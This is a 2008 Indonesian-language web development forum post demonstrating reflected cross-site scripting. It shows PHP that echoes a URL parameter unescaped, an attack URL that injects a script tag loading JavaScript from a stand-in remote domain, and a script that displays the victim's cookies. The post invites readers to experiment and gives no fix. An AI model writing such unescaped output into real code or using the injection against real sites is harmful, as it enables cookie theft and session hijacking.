2076 Posts in 483 Topics- by 820 Members - Latest Member: akunp2

Web Development and Design Forum - dremi.info > Webmaster > PHP Security > GET VARIABLE URL [XSS]
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: GET VARIABLE URL [XSS]  (Read 964 times)
webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« on: August 16, 2008, 02:36:46 PM »
GET VARIABLE URL [XSS]

untuk bug ini memang sederhana tapi ke na kalo smpet keindeks google, kan ga enak kalo diliat...

misalna aja ada variable $pesan pada URL tros ditampilin dengan perintah echo pada php di halaman web

contohna:

http://ko-main2.com/landingpage.php?act ... OK_Kterima

nah lo, kalo di web na ada ke gini:

Code:
<?
echo $_GET['pesan'];
?>

lah nyang ditampilin variable pesan tadi donk !!!

lalu gimana kalo gw bikin php inject na Huh? dengan methode XSS Huh? ( Cross Site Scripting)

misalna gw pake ke nyang ini:

Code:

http://ko-main2.com/landingpage.php?action=submit&pesan=<script src=http://injectdomain.com/gwgigitlu.js></script>


lalu dalam gwgigitlu.js tersimpan script js bwat ke gini misalna:

Code:
document.write ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);
alert ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);


nah liat apa yang terjadi, cookies pada server bisa keliatan...

selamat bereksperimen !!!
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged

Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to: